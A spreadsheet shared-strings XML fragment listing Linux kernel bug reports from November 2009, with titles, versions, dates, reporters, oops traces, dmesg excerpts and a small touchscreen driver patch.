  <si>
    <t>2.6.30.9</t>
  </si>
  <si>
    <t>2009-11-07 20:33 UTC</t>
  </si>
  <si>
    <t>2012-06-14 16:49 UTC</t>
  </si>
  <si>
    <t>Nov 7 22:59:58 nfssrv rsyncd[2253]: rsync error: received SIGINT, SIGTERM, or SIGHUP (code 20) at rsync.c(544) [receiver=3.0.6] Nov 7 23:00:00 nfssrv sshd[1932]: Received signal 15; terminating. Nov 7 23:00:00 nfssrv kernel: nfsd: last server has exited, flushing export cache Nov 7 23:00:00 nfssrv kernel: ------------[ cut here ]------------ Nov 7 23:00:00 nfssrv kernel: WARNING: at net/ipv4/af_inet.c:155 inet_sock_destruct+0x16f/0x1a2() Nov 7 23:00:00 nfssrv kernel: Hardware name: MS-7345 Nov 7 23:00:00 nfssrv kernel: Modules linked in: rtc_cmos i2c_i801 [last unloaded: f71882fg] Nov 7 23:00:00 nfssrv kernel: Pid: 1878, comm: nfsd Not tainted 2.6.30.9-default #2 Nov 7 23:00:00 nfssrv kernel: Call Trace: Nov 7 23:00:00 nfssrv kernel: [&lt;ffffffff802427fb&gt;] warn_slowpath_common+0x88/0xb6 Nov 7 23:00:00 nfssrv kernel: [&lt;ffffffff8024284b&gt;] warn_slowpath_null+0x22/0x38 Nov 7 23:00:00 nfssrv kernel: [&lt;ffffffff806cce5d&gt;] inet_sock_destruct+0x16f/0x1a2 Nov 7 23:00:00 nfssrv mountd[1869]: Caught signal 15, un-registering and exiting. Nov 7 23:00:00 nfssrv kernel: [&lt;ffffffff8067c78e&gt;] sk_free+0x2b/0xf0 Nov 7 23:00:00 nfssrv kernel: [&lt;ffffffff8067c913&gt;] sk_common_release+0xc0/0xdb Nov 7 23:00:00 nfssrv kernel: [&lt;ffffffff806c360f&gt;] udp_lib_close+0x1c/0x32 Nov 7 23:00:00 nfssrv kernel: [&lt;ffffffff806cc8ed&gt;] inet_release+0x63/0x80 Nov 7 23:00:00 nfssrv kernel: [&lt;ffffffff80679271&gt;] sock_release+0x2d/0x90 Nov 7 23:00:00 nfssrv kernel: [&lt;ffffffff80679307&gt;] sock_close+0x33/0x4b Nov 7 23:00:00 nfssrv kernel: [&lt;ffffffff802b77ee&gt;] __fput+0xe5/0x1b4 Nov 7 23:00:00 nfssrv kernel: [&lt;ffffffff802b78e5&gt;] fput+0x28/0x3e Nov 7 23:00:00 nfssrv kernel: [&lt;ffffffff807005c0&gt;] svc_sock_free+0x4b/0x75 Nov 7 23:00:00 nfssrv kernel: [&lt;ffffffff8070c268&gt;] svc_xprt_free+0x4d/0x74 Nov 7 23:00:00 nfssrv kernel: [&lt;ffffffff8070c21b&gt;] ? svc_xprt_free+0x0/0x74 Nov 7 23:00:00 nfssrv kernel: [&lt;ffffffff8045a842&gt;] kref_put+0x56/0x76 Nov 7 23:00:00 nfssrv kernel: [&lt;ffffffff8070b41a&gt;] svc_xprt_put+0x27/0x3d Nov 7 23:00:00 nfssrv kernel: [&lt;ffffffff8070b564&gt;] svc_close_xprt+0x4a/0x65 Nov 7 23:00:00 nfssrv kernel: [&lt;ffffffff8070b5dd&gt;] svc_close_all+0x5e/0x8f Nov 7 23:00:00 nfssrv kernel: [&lt;ffffffff806ff95e&gt;] svc_destroy+0xa0/0x157 Nov 7 23:00:00 nfssrv kernel: [&lt;ffffffff806ffad6&gt;] svc_exit_thread+0xc1/0xe0 Nov 7 23:00:00 nfssrv kernel: [&lt;ffffffff8039b81f&gt;] nfsd+0x131/0x146 Nov 7 23:00:00 nfssrv kernel: [&lt;ffffffff8039b6ee&gt;] ? nfsd+0x0/0x146 Nov 7 23:00:00 nfssrv kernel: [&lt;ffffffff80259266&gt;] kthread+0x68/0xa9 Nov 7 23:00:00 nfssrv kernel: [&lt;ffffffff8023f975&gt;] ? schedule_tail+0x33/0x7f Nov 7 23:00:00 nfssrv kernel: [&lt;ffffffff8020cd3a&gt;] child_rip+0xa/0x20 Nov 7 23:00:00 nfssrv kernel: [&lt;ffffffff802591fe&gt;] ? kthread+0x0/0xa9 Nov 7 23:00:00 nfssrv kernel: [&lt;ffffffff8020cd30&gt;] ? child_rip+0x0/0x20 Nov 7 23:00:00 nfssrv kernel: ---[ end trace d7577fa7e92ebcce ]--- Nov 7 23:00:00 nfssrv kernel: nfsd: last server has exited, flushing export cache Nov 7 23:00:01 nfssrv rpc.statd[1820]: Caught signal 15, un-registering and exiting. Nov 7 23:00:01 nfssrv syslog-ng[1787]: Termination requested via signal, terminating; Nov 7 23:00:01 nfssrv syslog-ng[1787]: syslog-ng shutting down; version='3.0.4' I received this message several time on shutdown in past weeks. The machine hangs once in a week. Either hardlockup (blinking keyboard LEDs) or reacts to SysRq at least. It is MSI Neo2P35-FIR, now with latest BIOS. It has 4 SATA drives on its ICH9R bridge (in AHCI mode) and two on the Marwell chip. I use mdraid (2 drives raid1, 4 drives on ICH9 chip in raid10 mode). I already disabled USB even network card but no luck. Basically I suspect IRQ-related problem. However, this stacktrace doesn't look like IRQ related. This is a Gentoo Linux ~amd64 machine.</t>
  </si>
  <si>
    <t>SCSI tape driver: Spurious EIO and kernel BUG</t>
  </si>
  <si>
    <t>2.6.29.4, 2.6.30.3, 2.6.31.5</t>
  </si>
  <si>
    <t>2009-11-09 08:29 UTC</t>
  </si>
  <si>
    <t>Joachim Breuer</t>
  </si>
  <si>
    <t>2012-06-14 16:51 UTC</t>
  </si>
  <si>
    <t>Created attachment 23702 [details] BUG console capture from 2.6.30.3 while writing to tape Overview: Performing tape backups using amanda 2.6.0-p2 [using 512kB block size] leads to spurious 'EIO' errors when writing to the tape; most of the time a kernel BUG is hit shortly thereafter. Steps to reproduce: Using amanda 2.6.0-p2 to perform tape backups to an HP C5683A DDS-4 tape drive; connected to a Adaptec 29160 Ultra160 SCSI adapter / aic7892: Ultra160 Wide Channel A, SCSI Id=7, 32/253 SCBs. Actual results: Amanda ALWAYS (on affected kernels, see below) complains about an EIO while writing to the tape a few (&lt; 1000) MB into the tape; most of the time a kernel BUG is displayed and the system becomes unresponsive. See attachments BUG-*.txt for a selection. Unfortunately, I could not save readable BUG output from 2.6.31.5 due to a management console problem; if there is great demand I can certainly reproduce the BUG output with working console capture. Expected results: Amanda should correctly write to tape during backup as it does using kernels &lt;= 2.6.27.10. Affected versions: The oldest kernel I tried which DOES exhibit the problem is 2.6.29.4; other kernels exhibiting this problem are 2.6.30.3 and 2.6.31.5. Non-affected versions: A distribution-patched kernel based on version 2.6.23 [2.6.23-gentoo-r8] used to work correctly since February 2008; the newest kernel I tried which did not exhibit this problem is 2.6.27.10. I did not try any 2.6.28 kernel. Additional information: See lshw-2.6.27.10.txt for a complete hardware overview; and dmesg-2.6.27.10.txt/dmesg-2.6.29.4.txt for dmesg output on a working/non-working kernel, respectively.</t>
  </si>
  <si>
    <t>Kernel panic: EDAC MC0: INTERNAL ERROR: channel-b out of range</t>
  </si>
  <si>
    <t>2009-11-09 15:23 UTC</t>
  </si>
  <si>
    <t>Tamas Vincze</t>
  </si>
  <si>
    <t>drivers_edac@kernel-bugs.osdl.org</t>
  </si>
  <si>
    <t>Created attachment 23713 [details] Full console log EDAC MC0: INTERNAL ERROR: channel-b out of range (4 &gt;= 4) Kernel panic - not syncing: EDAC MC0: Uncorrected Error (XEN) Domain 0 crashed: 'noreboot' set - not rebooting. Kernel is 2.6.18-164.el5xen Server board is a Supermicro X7DBi+ (Intel 5000P chipset) with 16GB RAM.</t>
  </si>
  <si>
    <t>Data Corruption with Adaptec 52445, Firmware 5.2-0 (17380)</t>
  </si>
  <si>
    <t>2009-11-10 13:31 UTC</t>
  </si>
  <si>
    <t>lkolbe</t>
  </si>
  <si>
    <t>2009-11-23 19:12 UTC</t>
  </si>
  <si>
    <t>Created attachment 23725 [details] dmesg of the running (and failing) 2.6.32-rc6 on this system When booting this system with the 2.6.32-rc6 kernel, we see immediate data corruption on the root filesystem: [ 21.813985] Adding 4194296k swap on /dev/mapper/system-swap. Priority:-1 extents:1 across:4194296k [ 21.903794] sd 0:0:0:0: [sda] Unhandled sense code [ 21.903865] sd 0:0:0:0: [sda] Result: hostbyte=DID_OK driverbyte=DRIVER_SENSE [ 21.903998] sd 0:0:0:0: [sda] Sense Key : Hardware Error [current] [ 21.904219] sd 0:0:0:0: [sda] Add. Sense: Internal target failure [ 21.904382] sd 0:0:0:0: [sda] CDB: Write(10): 2a 00 00 00 01 bf 00 00 08 00 [ 21.905051] end_request: I/O error, dev sda, sector 447 [ 21.905122] Buffer I/O error on device dm-0, logical block 0 [ 21.905191] lost page write due to I/O error on dm-0 [ 21.905271] EXT3 FS on dm-0, internal journal [ 23.263958] sd 0:0:0:0: [sda] Unhandled sense code [ 23.264029] sd 0:0:0:0: [sda] Result: hostbyte=DID_OK driverbyte=DRIVER_SENSE [ 23.264162] sd 0:0:0:0: [sda] Sense Key : Hardware Error [current] [ 23.264368] sd 0:0:0:0: [sda] Add. Sense: Internal target failure [ 23.264531] sd 0:0:0:0: [sda] CDB: Write(10): 2a 00 00 bc 11 cf 00 00 08 00 [ 23.265186] end_request: I/O error, dev sda, sector 12325327 [ 23.265257] Buffer I/O error on device dm-1, logical block 492034 [ 23.265327] lost page write due to I/O error on dm-1 [ 23.364800] kjournald starting. Commit interval 5 seconds [ 23.423871] sd 0:0:0:0: [sda] Unhandled sense code [ 23.423874] sd 0:0:0:0: [sda] Result: hostbyte=DID_OK driverbyte=DRIVER_SENSE [ 23.423877] sd 0:0:0:0: [sda] Sense Key : Hardware Error [current] [ 23.423880] sd 0:0:0:0: [sda] Add. Sense: Internal target failure [ 23.423886] sd 0:0:0:0: [sda] CDB: Write(10): 2a 00 00 80 01 bf 00 00 08 00 [ 23.423893] end_request: I/O error, dev sda, sector 8389055 [ 23.423983] Buffer I/O error on device dm-1, logical block 0 [ 23.424052] lost page write due to I/O error on dm-1 On 2.6.30 the system works 'fine' (in that it doesn't shredder the filesystems on bootup). dmesg, lspci, lsscsi all attached later.</t>
  </si>
  <si>
    <t>b43 crashes very often(oops inside) in ap mode</t>
  </si>
  <si>
    <t>2009-11-10 22:06 UTC</t>
  </si>
  <si>
    <t>2010-01-27 21:11 UTC</t>
  </si>
  <si>
    <t>Created attachment 23734 [details] b43-dmesg hi, here are the hardware and software version: kernel 2.6.31 firmware openfwwf-5.2 hostapd 0.6.9 libnl 1.1-r2 under gentoo card : 00:12.0 Network controller: Broadcom Corporation BCM4318 [AirForce One 54g] 802.11g Wireless LAN Controller (rev 02) here's an example of crash(for the search function): [13903.199860] ------------[ cut here ]------------ [13903.199910] WARNING: at drivers/net/wireless/b43/dma.c:1340 b43_dma_tx+0x88f/0x980 [b43]() [13903.199922] Hardware name: HP Vectra [13903.199929] Modules linked in: b43 ssb [last unloaded: ssb] [13903.199952] Pid: 4595, comm: syslog-ng Tainted: G W 2.6.31_router #3 [13903.199962] Call Trace: [13903.200002] [&lt;d49b622f&gt;] ? b43_dma_tx+0x88f/0x980 [b43] [13903.200019] [&lt;c102dceb&gt;] ? warn_slowpath_common+0x8b/0xd0 [13903.200060] [&lt;d49b622f&gt;] ? b43_dma_tx+0x88f/0x980 [b43] [13903.200078] [&lt;c102dd50&gt;] ? warn_slowpath_null+0x20/0x40 [13903.200118] [&lt;d49b622f&gt;] ? b43_dma_tx+0x88f/0x980 [b43] [13903.200136] [&lt;c159f9e0&gt;] ? invoke_tx_handlers+0x780/0xea0 [13903.200158] [&lt;c10654d9&gt;] ? handle_IRQ_event+0x39/0xe0 [13903.200194] [&lt;d49a09e0&gt;] ? b43_op_tx+0x50/0xa0 [b43] [13903.200210] [&lt;c159e82f&gt;] ? __ieee80211_tx+0x6f/0xf0 [13903.200210] [&lt;c15a0330&gt;] ? ieee80211_tx+0xd0/0x1f0 [13903.200210] [&lt;c15a0892&gt;] ? ieee80211_master_start_xmit+0x192/0x370 [13903.200210] [&lt;c1420ee3&gt;] ? dev_hard_start_xmit+0x233/0x2e0 [13903.200210] [&lt;c143395d&gt;] ? __qdisc_run+0x13d/0x1c0 [13903.200210] [&lt;c103811e&gt;] ? run_timer_softirq+0x1e/0x170 [13903.200210] [&lt;c14241e7&gt;] ? net_tx_action+0x87/0xc0 [13903.200210] [&lt;c1032d80&gt;] ? __do_softirq+0x80/0x110 [13903.200210] [&lt;c10654d9&gt;] ? handle_IRQ_event+0x39/0xe0 [13903.200210] [&lt;c1032e55&gt;] ? do_softirq+0x45/0x50 [13903.200210] [&lt;c1033135&gt;] ? irq_exit+0x85/0x90 [13903.200210] [&lt;c1005410&gt;] ? do_IRQ+0x50/0xd0 [13903.200210] [&lt;c103260c&gt;] ? sys_gettimeofday+0x3c/0x90 [13903.200210] [&lt;c1003550&gt;] ? common_interrupt+0x30/0x38 [13903.200210] ---[ end trace 22d2ed5769f8ce0c ]--- *I've the serial cable so kgdb is an option *should I try to compile it with debug(-g) and do addr2line or are the function name are enough? Denis.</t>
  </si>
  <si>
    <t>NFSv4 crash</t>
  </si>
  <si>
    <t>2.6.24-24-server #1 SMP x86_64</t>
  </si>
  <si>
    <t>2009-11-11 22:37 UTC</t>
  </si>
  <si>
    <t>ooops</t>
  </si>
  <si>
    <t>2009-11-11 22:49 UTC</t>
  </si>
  <si>
    <t>I have a server that exports both to v3 clients as well as v4 clients. Server and clients are both Ubuntu Hardy -server. No junk drivers are loaded. Oops: [3555481.130335] ------------[ cut here ]------------ [3555481.130381] kernel BUG at /build/buildd/linux-2.6.24/fs/nfs/namespace.c:108! [3555481.130426] invalid opcode: 0000 [1] SMP [3555481.130455] CPU 1 [3555481.130477] Modules linked in: nls_cp437 cifs iptable_filter ip_tables x_tables nfs lockd nfs_acl sunrpc parport_pc lp parport loop ipv6 serio_raw iTCO_wdt dcdbas button iTCO_vendor_support shpchp pci_hotplug evdev psmouse pcspkr ext3 jbd mbcache sg sd_mod sr_mod cdrom pata_acpi ata_generic ata_piix uhci_hcd ehci_hcd libata scsi_mod usbcore tg3 thermal processor fan fbcon tileblit font bitblit softcursor fuse [3555481.130742] Pid: 1539, comm: bash Not tainted 2.6.24-24-server #1 [3555481.130771] RIP: 0010:[&lt;ffffffff882cd9ae&gt;] [&lt;ffffffff882cd9ae&gt;] :nfs:nfs_follow_mountpoint+0x39e/0x440 [3555481.130840] RSP: 0018:ffff810100d2f938 EFLAGS: 00010246 [3555481.130867] RAX: 0000000000000000 RBX: ffff810106464588 RCX: 0000000000000224 [3555481.130912] RDX: ffff81018f23b600 RSI: ffff810100d2fe48 RDI: ffff81017f1d5270 [3555481.130956] RBP: ffff81017f1d5270 R08: 0000000000000000 R09: 0000000000000002 [3555481.131000] R10: 0000000000000001 R11: ffffffff8031a9b0 R12: ffff810100d2fe48 [3555481.131044] R13: ffff81015e097600 R14: ffff81017f1d5270 R15: ffff810180a9f900 [3555481.131089] FS: 00007f86369636e0(0000) GS:ffff81019a001800(0000) knlGS:0000000000000000 [3555481.131136] CS: 0010 DS: 0000 ES: 0000 CR0: 000000008005003b [3555481.131164] CR2: 0000000000791031 CR3: 00000001949bf000 CR4: 00000000000006e0 [3555481.131208] DR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000 [3555481.131253] DR3: 0000000000000000 DR6: 00000000ffff4ff0 DR7: 0000000000000400 [3555481.131297] Process bash (pid: 1539, threadinfo ffff810100d2e000, task ffff8101979467f0) [3555481.131343] Stack: 000000011535bb3b 0000000000000000 0000000000000000 ffffffff802544e8 [3555481.131400] ffff81012c276850 ffff810100000000 ffff81012c2767c0 ffffffff882c2d45 [3555481.131454] ffff810100d2f9f8 ffff81012c276850 000000000000000e ffffffff80254719 [3555481.131491] Call Trace: [3555481.131538] [&lt;ffffffff802544e8&gt;] wake_up_bit+0x18/0x40 [3555481.131580] [&lt;ffffffff882c2d45&gt;] :nfs:__nfs_revalidate_inode+0x95/0x300 [3555481.131615] [&lt;ffffffff80254719&gt;] remove_wait_queue+0x19/0x60 [3555481.131662] [&lt;ffffffff882e346b&gt;] :nfs:nfs_idmap_id+0x1eb/0x250 [3555481.131697] [&lt;ffffffff80231924&gt;] source_load+0x34/0x70 [3555481.131730] [&lt;ffffffff802331ca&gt;] find_busiest_group+0x1fa/0x850 [3555481.131767] [&lt;ffffffff802c8def&gt;] __d_lookup+0xaf/0x140 [3555481.131800] [&lt;ffffffff802c825f&gt;] dput+0x1f/0x130 [3555481.131831] [&lt;ffffffff802bd689&gt;] __follow_mount+0x29/0xa0 [3555481.131864] [&lt;ffffffff802bd8df&gt;] do_lookup+0x8f/0x250 [3555481.131899] [&lt;ffffffff802c03f2&gt;] __link_path_walk+0xcb2/0xe90 [3555481.131932] [&lt;ffffffff80231924&gt;] source_load+0x34/0x70 [3555481.131968] [&lt;ffffffff802c062b&gt;] link_path_walk+0x5b/0x100 [3555481.132006] [&lt;ffffffff802cbd18&gt;] touch_atime+0x88/0x160 [3555481.132040] [&lt;ffffffff802c0433&gt;] __link_path_walk+0xcf3/0xe90 [3555481.132078] [&lt;ffffffff802c062b&gt;] link_path_walk+0x5b/0x100 [3555481.132116] [&lt;ffffffff802c35be&gt;] filldir+0xae/0xf0 [3555481.132149] [&lt;ffffffff802c08ea&gt;] do_path_lookup+0x8a/0x250 [3555481.132181] [&lt;ffffffff802bf489&gt;] getname+0x1a9/0x220 [3555481.132213] [&lt;ffffffff802c154b&gt;] __user_walk_fd+0x4b/0x80 [3555481.132246] [&lt;ffffffff802b915f&gt;] vfs_stat_fd+0x2f/0x80 [3555481.132284] [&lt;ffffffff802b9247&gt;] sys_newstat+0x27/0x50 [3555481.132320] [&lt;ffffffff802b4acf&gt;] sys_close+0x9f/0x100 [3555481.132352] [&lt;ffffffff8020c39e&gt;] system_call+0x7e/0x83 [3555481.132386] [3555481.132406] [3555481.132406] Code: 0f 0b eb fe 48 c7 c7 5a 9a 2e 88 31 c0 e8 d0 11 f7 f7 8b 05 [3555481.132512] RIP [&lt;ffffffff882cd9ae&gt;] :nfs:nfs_follow_mountpoint+0x39e/0x440 [3555481.132571] RSP &lt;ffff810100d2f938&gt; [3555481.132855] ---[ end trace 0fdd4eaf4a500a54 ]--- [3555497.466953] ------------[ cut here ]------------</t>
  </si>
  <si>
    <t>Kernel panic - not syncing: stack-protector: Kernel stack is corrupted in: ccccb5b0</t>
  </si>
  <si>
    <t>2.6.31.5, 2.6.31.6 (Debian kernel)</t>
  </si>
  <si>
    <t>2009-11-12 02:25 UTC</t>
  </si>
  <si>
    <t>Hideki Yamane</t>
  </si>
  <si>
    <t>2010-10-01 08:16 UTC</t>
  </si>
  <si>
    <t>Created attachment 23753 [details] /var/log/kern.log file I'm using Thinkpad i1157 (mostly same as Thinkpad 570), and it hanged up with 2.6.31.5 based Debian kernel. The error message is &gt; (snip) &gt; INIT: version 2.86 booting &gt; Starting the hotplug events dispatcher: udevd. &gt; Synthesizing the initial hotplug events ... done. &gt; Waiting for /dev to be fully poplulated...[ 11.526424] Kernel panic - not &gt; syncing: stack-protector: Kernel stack is corrupted in: ccccb5b0 &gt; [ 11.526538] And, previous 2.6.30.8 based one works fine.</t>
  </si>
  <si>
    <t>ISDN-B-channel-bundling broken</t>
  </si>
  <si>
    <t>2009-11-13 17:21 UTC</t>
  </si>
  <si>
    <t>schaefer.frank</t>
  </si>
  <si>
    <t>2012-06-18 12:28 UTC</t>
  </si>
  <si>
    <t>When I add the 2nd B-channel to an existing connection - the displayed datarate drops to some hundred bytes/sec - I can't reach other host anymore. - ping hangs (no error-message about unreachable host) - after removing the 2nd link, everything works fine again Configuration: - hisax driver - ifup/ifdown with slave-device - second channel is added with ioctl(..., IIOCNETDLN, ...) - tested with device ASUSTeK Computer Inc. ISDNLink P-IN100-ST-D (rev 02) This bug is present since since kernel 2.6.28 (2.6.27-rc6) and has been introduced with commit 38783e671399b5405f1fd177d602c400a9577ae6 Author: David S. Miller &lt;davem@davemloft.net&gt; Date: Mon Sep 22 01:15:02 2008 -0700 isdn: isdn_ppp: Use SKB list facilities instead of home-grown implementation.</t>
  </si>
  <si>
    <t>thinkpad-acpi: driver fails to load on old BIOS for the A31, T23-T30, X30-X31</t>
  </si>
  <si>
    <t>2009-11-13 20:45 UTC</t>
  </si>
  <si>
    <t>The driver will fail to detect BIOSes that both lack the "ThinkPad" string in the DMI tables, and the EC version string, for ThinkPads that have the EC version string on the most up-to-date BIOSES. This causes the driver to return -ENODEV, and the module will not load. The problem can be worked around by giving the module the "force_load=1" parameter. Problem tracked down to the quirk tables used as a fallback for known-BIOS detection, they would not match if the EC version is flagged as "unknown".</t>
  </si>
  <si>
    <t>Commit 4ae0ff606 break probing of cardbus</t>
  </si>
  <si>
    <t>2.6.29.6+</t>
  </si>
  <si>
    <t>2009-11-14 15:43 UTC</t>
  </si>
  <si>
    <t>2010-07-08 15:59 UTC</t>
  </si>
  <si>
    <t>Cardbus devices fail probe with error -5 due to NULL archdata.dma_ops. For example in sata_sil.c function sil_init_one rc = pci_set_dma_mask(pdev, ATA_DMA_MASK); which returns -5 (-EIO) because get_dma_ops(&amp;pdev-&gt;dev); returns NULL. Adding set_dma_ops(dev, &amp;dma_direct_ops) to the driver fixes the problem, but I don't know if that is the right place to add the call or if that is multi-platform appropriate. Perhaps the cardbus bridge (yenta) should have the call? I think this is the same as https://bugs.launchpad.net/ubuntu/+bug/421940 except that it is a rt2500 card. Also http://bugzilla.kernel.org/show_bug.cgi?id=14121 except that it is for ath5k.</t>
  </si>
  <si>
    <t>LED not working in ath5k AR242x subsystem 1a32:0112</t>
  </si>
  <si>
    <t>2009-11-15 17:58 UTC</t>
  </si>
  <si>
    <t>Shahar Or</t>
  </si>
  <si>
    <t>2009-12-08 13:50 UTC</t>
  </si>
  <si>
    <t>Created attachment 23789 [details] lspci -vnn I see three different reports saying the same thing, and I think they were solved in the same way, by adding a line with the subsystem id: http://bugzilla.kernel.org/show_bug.cgi?id=12903 http://bugzilla.kernel.org/show_bug.cgi?id=13455 http://bugzilla.kernel.org/show_bug.cgi?id=12841 So here's a new one for my card: 0c:00.0 Network controller [0280]: Atheros Communications Inc. AR242x 802.11abg Wireless PCI Express Adapter [168c:001c] (rev 01) Subsystem: Device [1a32:0112] Flags: bus master, fast devsel, latency 0, IRQ 17 Memory at f6cf0000 (64-bit, non-prefetchable) [size=64K] Capabilities: &lt;access denied&gt; Kernel driver in use: ath5k_pci Kernel modules: ath_pci, ath5k Can't this be resolved in a way that the led will work for all subsystems?</t>
  </si>
  <si>
    <t>erroneous code in /usr/src/linux-source-2.6.31/drivers/input/mouse/lifebook.c</t>
  </si>
  <si>
    <t>2009-11-16 04:25 UTC</t>
  </si>
  <si>
    <t>Abner Holsinger</t>
  </si>
  <si>
    <t>2010-02-23 21:27 UTC</t>
  </si>
  <si>
    <t>Created attachment 23795 [details] diff file of kernel driver file and fixed version of file the stanza for the Panasonic CF-72 touchscreen has the wrong protocol data I have been patching this myself for a couple of years and thought I ought to send word up to the kernel dev team when I noticed that the CF-72 stanza had been added, but with the incorrect settings. this is the attached diff; --- /usr/src/linux-source-2.6.31/drivers/input/mouse/lifebook.c 2009-09-09 17:13:59.000000000 -0500 +++ /tmp/mouse/lifebook.c 2009-11-15 21:42:59.624587656 -0600 @@ -107,8 +107,7 @@ .matches = { DMI_MATCH(DMI_PRODUCT_NAME, "CF-72"), }, - .callback = lifebook_set_serio_phys, - .driver_data = "isa0060/serio3", + .callback = lifebook_set_6byte_proto, }, { .ident = "Lifebook B142",</t>
  </si>
  <si>
    <t>2.6.31.6 - Keyboard nearly everytime dead after acpi s3 resume</t>
  </si>
  <si>
    <t>2.6.31.6</t>
  </si>
  <si>
    <t>2009-11-16 19:45 UTC</t>
  </si>
  <si>
    <t>Suspend and resume from ram seems to work mostly on my new computer. But after resume from acpi S3 mode the keyboard is dead. I still can press the "reboot" button in gnome, but the system doesn't reboot than. The last line I see in the reboot process is "Sending all processes the TERM signal" - On this point the system waits forever. Will attach the config and a dmesg.</t>
  </si>
  <si>
    <t>ext3/jbd oops in journal_start</t>
  </si>
  <si>
    <t>2009-11-16 21:22 UTC</t>
  </si>
  <si>
    <t>2009-11-20 20:26 UTC</t>
  </si>
  <si>
    <t>Subject : ext3/jbd oops in journal_start Submitter : Sage Weil &lt;sage@newdream.net&gt; Date : 2009-10-31 6:14 References : http://marc.info/?l=linux-kernel&amp;m=125696970418300&amp;w=4 Notify-Also : Dmitry Monakhov &lt;rjevskiy@gmail.com&gt; Notify-Also : Chris Mason &lt;chris.mason@oracle.com&gt; This entry is being used for tracking a regression from 2.6.31. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>WARNING: at mm/page_alloc.c:1805 __alloc_pages_nodemask</t>
  </si>
  <si>
    <t>2009-11-16 21:30 UTC</t>
  </si>
  <si>
    <t>2009-11-17 22:52 UTC</t>
  </si>
  <si>
    <t>Subject : 2.6.31-rc6: WARNING: at mm/page_alloc.c:1805 __alloc_pages_nodemas Submitter : Rogério Brito &lt;rbrito@ime.usp.br&gt; Date : 2009-11-06 23:10 References : http://marc.info/?l=linux-kernel&amp;m=125754907413892&amp;w=4 This entry is being used for tracking a regression from 2.6.31. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>Mount -o sync regression in 2.6.31</t>
  </si>
  <si>
    <t>2009-11-16 21:53 UTC</t>
  </si>
  <si>
    <t>2010-12-18 00:58 UTC</t>
  </si>
  <si>
    <t>Subject : Mount -o sync regression in 2.6.31 Submitter : Stephen Hemminger &lt;shemminger@vyatta.com&gt; Date : 2009-11-11 20:33 References : http://marc.info/?l=linux-kernel&amp;m=125797165709131&amp;w=4 Notify-Also : Frans Pop &lt;elendil@planet.nl&gt; Notify-Also : Andrew Morton &lt;akpm@linux-foundation.org&gt; Notify-Also : Frederic Weisbecker &lt;fweisbec@gmail.com&gt; This entry is being used for tracking a regression from 2.6.30. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>ath9k: BUG kmalloc-8192: Poison overwritten</t>
  </si>
  <si>
    <t>2.6.32-rc6-git4</t>
  </si>
  <si>
    <t>2009-11-16 21:57 UTC</t>
  </si>
  <si>
    <t>2010-10-31 18:11 UTC</t>
  </si>
  <si>
    <t>Atheros developers</t>
  </si>
  <si>
    <t>Subject : 2.6.32-rc6-git4 -- BUG kmalloc-8192: Poison overwritten - INFO: Allocated in ath_rxbuf_alloc+0x1c/0x70 [ath] age=526999 cpu=1 pid=1275 Submitter : Miles Lane &lt;miles.lane@gmail.com&gt; Date : 2009-11-12 4:58 References : http://marc.info/?l=linux-kernel&amp;m=125800196520396&amp;w=4 Notify-Also : "Luis R. Rodriguez" &lt;mcgrof@gmail.com&gt; This entry is being used for tracking a regression from 2.6.31. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>Commit d451564 breaks ARM</t>
  </si>
  <si>
    <t>2009-11-16 22:03 UTC</t>
  </si>
  <si>
    <t>2010-01-24 23:39 UTC</t>
  </si>
  <si>
    <t>Subject : d451564 breakage Submitter : Russell King &lt;rmk+lkml@arm.linux.org.uk&gt; Date : 2009-11-13 15:11 References : http://marc.info/?l=linux-kernel&amp;m=125812520315835&amp;w=4 Notify-Also : Ingo Molnar &lt;mingo@elte.hu&gt; This entry is being used for tracking a regression from 2.6.31. Please don't close it until the problem is fixed in the mainline. Caused by: commit d4515646699b6ad7b1a98ceb871296b957f3ef47 Author: Soeren Sandmann &lt;sandmann@daimi.au.dk&gt; Date: Wed Oct 28 18:56:35 2009 +0100 highmem: Fix debug_kmap_atomic() to also handle KM_IRQ_PTE, KM_NMI, and KM_NMI_PTE First-Bad-Commit : d4515646699b6ad7b1a98ceb871296b957f3ef47</t>
  </si>
  <si>
    <t>i915: *ERROR* Execbuf while wedged</t>
  </si>
  <si>
    <t>2009-11-16 22:10 UTC</t>
  </si>
  <si>
    <t>2010-01-15 09:01 UTC</t>
  </si>
  <si>
    <t>14728 14862</t>
  </si>
  <si>
    <t>Subject : [regression] [drm:i915_gem_execbuffer] *ERROR* Execbuf while wedged Submitter : Michael &lt;schnitzelkuchen@googlemail.com&gt; Date : 2009-11-15 10:48 References : http://lkml.org/lkml/2009/11/15/40 Notify-Also : David Woodhouse &lt;david.woodhouse@intel.com&gt; This entry is being used for tracking a regression from 2.6.31. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>Oops on i915 on 8086:a011 pine trail</t>
  </si>
  <si>
    <t>2009-11-16 22:15 UTC</t>
  </si>
  <si>
    <t>2009-11-17 23:02 UTC</t>
  </si>
  <si>
    <t>Subject : Oops on i915 on 8086:a011 pine trail 2.6.32-rc6 Submitter : "Luis R. Rodriguez" &lt;mcgrof@gmail.com&gt; Date : 2009-11-10 23:27 References : http://marc.info/?l=linux-kernel&amp;m=125789570519147&amp;w=4 Notify-Also : Woody Suwalski &lt;woodys@xandros.com&gt; This entry is being used for tracking a regression from 2.6.31. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>sched_rt_periodic_timer vs cpu hotplug</t>
  </si>
  <si>
    <t>2009-11-16 22:19 UTC</t>
  </si>
  <si>
    <t>2009-12-29 21:22 UTC</t>
  </si>
  <si>
    <t>Subject : [BUG] sched_rt_periodic_timer vs cpu hotplug Submitter : Heiko Carstens &lt;heiko.carstens@de.ibm.com&gt; Date : 2009-11-11 10:18 References : http://marc.info/?l=linux-kernel&amp;m=125793470309588&amp;w=4 Handled-By : Peter Zijlstra &lt;peterz@infradead.org&gt; Patch : http://patchwork.kernel.org/patch/60250/ This entry is being used for tracking a regression from 2.6.31. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>serial8250: too much work for  ... ,the 8250 dead but will recover after echo t &gt;/proc/sysrq-triger</t>
  </si>
  <si>
    <t>2009-11-18 09:29 UTC</t>
  </si>
